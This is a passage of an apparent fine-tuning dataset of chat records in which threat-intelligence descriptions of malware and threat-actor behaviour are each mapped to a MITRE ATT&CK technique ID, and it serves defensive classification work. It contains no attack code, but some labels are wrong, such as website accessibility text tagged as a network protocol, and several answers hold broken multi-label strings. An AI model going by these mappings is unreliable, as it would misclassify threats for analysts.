- "role": "user",
- "content": "The script hides under multiple layers of encryption, obfuscation, and encoding techniques. For this sample, we were able to reveal three layers of code. The top-most layer executes a base64-encoded command"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can enumerate the OS version and computer name on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains unused machine instructions in a likely attempt to hinder analysis."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands such as \"net group\" and \"net localgroup\" can be used in Net to gather information about and manipulate groups."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has a function to write itself to Registry values."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has performed DLL search order hijacking to execute their payload."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, Reaver.v1 will execute the ‘~WUpdate.lnk’ file in a new process, thus loading the recently dropped malicious CPL file"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 has acquired C2 domains through resellers."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then executes a new instance of itself in a new process. Also, it will remove the original file via the following command that is executed in a batch script named 'date.bat"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has the ability to identify the username on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. This backdoor can only execute additional PowerShell scripts. It writes the command results in another OneDrive subfolder and encrypts it with the XOR key 0xAA"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CopyKittens encrypts data with a substitute cipher prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SQLRat has created scheduled tasks in \"%appdata%\\Roaming\\Microsoft\\Templates\\\"."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can capture microphone recordings."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Emissary configuration is now encrypted using a custom algorithm that uses the \"srand\" function to seed the \"rand\" function using a value of 2563. This seed value causes the \"rand\" function to generate the same values each time, which Emissary will use as a key along with the XOR operation. The configuration now contains the version number of Emissary, instead of the version being hardcoded into the Trojan"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label \"C:\\\" and the computer name. The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string. The main function then calls the subfunction with the argument 3 to get the POST data parameter (“porg”) along with the volume serial number and computer name and will send this data to the C2 via the HTTP POST request. The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \"open\" function using the ShellExecuteW API function. Also, the author capitalized the “E” in the “dde” command to evade case sensitive signatures. Lastly, the author bolded the “dd” characters within the “dde” command, which breaks the string up within the XML of the DOCX file (word/document.xml) to make signature development difficult, as seen here"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates files by splitting strings into smaller sub-strings and including \"garbage\" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has deleted dropper files on an infected system using command scripts."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After unpacking the module, it is packed with an additional inner packer Pe123\\RPolyCryptor"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin can save a new file to the system from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can use run keys and create link files in the startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has enabled Wdigest by changing the registry value from 0 to 1."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linfo creates a backdoor through which remote attackers can change C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used the BlackEnergy KillDisk component to overwrite files on Windows-based Human-Machine Interfaces."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exact date when the malware was compiled is unknown – the recent wrapper DLL samples were tampered with by the malware authors, with the PE timestamps manually set to zero values. However, during our research, we found an earlier version of the malware with a PE timestamp reading Oct 13, 2013, so the compilation date of the later version is almost surely more recent"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands passed as arguments into e.py were also seen being executed by the targeted Windows guest machine, running as a child process under vmtoolsd.exe. This execution chain can be seen in Figure 5. The parent binary /bin/rdt was not present on disk but was able to be recovered by dumping the processes memory of the ESXi hypervisor. The python script that sent out commands to the guest machines, e.py, was unable to be recovered."
- },
- {
- "role": "assistant",
- "content": "T1202 - Indirect Command Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Matryoshka is capable of providing Meterpreter shell access."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti has used API calls during execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used \"net use\" to conduct connectivity checks to machines."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a keylogging tool that records keystrokes in encrypted files."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a .lnk file to the Windows startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used VBscript to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An executable dropped onto victims by aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe)."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender. The payloads themselves are rather interesting, as the developer wraps the malicious code with legitimate source code freely available online"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples use AES to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As with other versions of Winnti, the core component of the malware doesn’t natively provide the operators with distinct functionality⁸. This component is primarily designed to handle communications and the deployment of modules directly from the command-and-control servers. However, prior reporting⁹ suggests that the operators commonly deploy plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host. We expect similar functionality to be leveraged via additional modules for Linux"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis can use Base64 to encode its C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then, it encrypts it with 3DES before sending it (figure 28). The _P.Y (\"0295A. 1618C\") method in figure 26 creates the MD5 hash of the string. This hash is used as secret for the 3DES encryption"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This targeting of third party organizations to attack further targets is a risky move on the attackers’ part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents Making sense of MuddyWater When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: \"ipconfig /all >> %temp%\\download\""
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains a command to list processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has used HTTP GET and POST requests over port 443 for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The JavaScript is heavily obfuscated. The first variable—a—is an array of obfuscated values"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used `mshta` to execute DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of creating reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP)."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can collect the IP address of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has the ability to encrypt PE files with a reverse XOR loop."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
